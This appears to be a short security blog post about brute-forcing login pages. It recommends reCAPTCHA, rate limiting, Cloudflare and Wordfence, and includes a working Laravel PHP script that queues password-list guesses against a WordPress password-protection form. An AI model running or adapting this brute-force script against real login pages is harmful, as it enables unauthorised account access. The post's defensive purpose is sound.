Most people don’t realize but it’s very easy to Bruteforce login pages and find the correct password.
Dictionaries are freely available online, VPS are cheap.
Anyone with some coding knowledge can write a program and attack your websites endpoints.
What can you do about it?
If you’re not using Recaptcha or invalid login rate limiting you should do that as soon as possible.
Further, put your server behind a service like Cloudflare, it’s free. CF will automatically detect these sort of malicious requests and block the server.
If you’re using WordPress, install Wordfence plugin.
How Bruteforce works:
Its simple, a hacker would find a commonly used passwords list online and send requests to your login page until it finds the correct passwords.
Example of script for educational purpose:
$list = Storage::get('brute_force.csv');
$listArr = explode(',', $list);
foreach($listArr as $pass) {
// Push each request to queue!
ProcessRequestJob::dispatch($pass);
}
ProcessRequestJob.php
class ProcessRequestJob implements ShouldQueue
{
use Dispatchable, InteractsWithQueue, Queueable, SerializesModels;
protected $password;
public function __construct($password) {
$this->password = $password;
}
public function handle(): void
{
$arClean = str_replace(' ', '', $this->password);
Log::info('Called API with password: ' . $this->password);
$resp = Http::asForm()->post('https://example.com?action=login', [
'input_wp_protect_password' => $arClean
]);
$respHtml = $resp->body();
if(!strpos($respHtml, 'Please enter the correct password!')) {
Log::info('Found matching password ' . $arClean);
} else {
Storage::append('used.csv', $arClean . ",");
Log::info('Nothing found');
}
Log::info('Saving used password: ' . $arClean);
}
}
This script will fail if you’re using Recaptcha, rate limiting or Cloudflare. Recaptcha is the easiest solution!
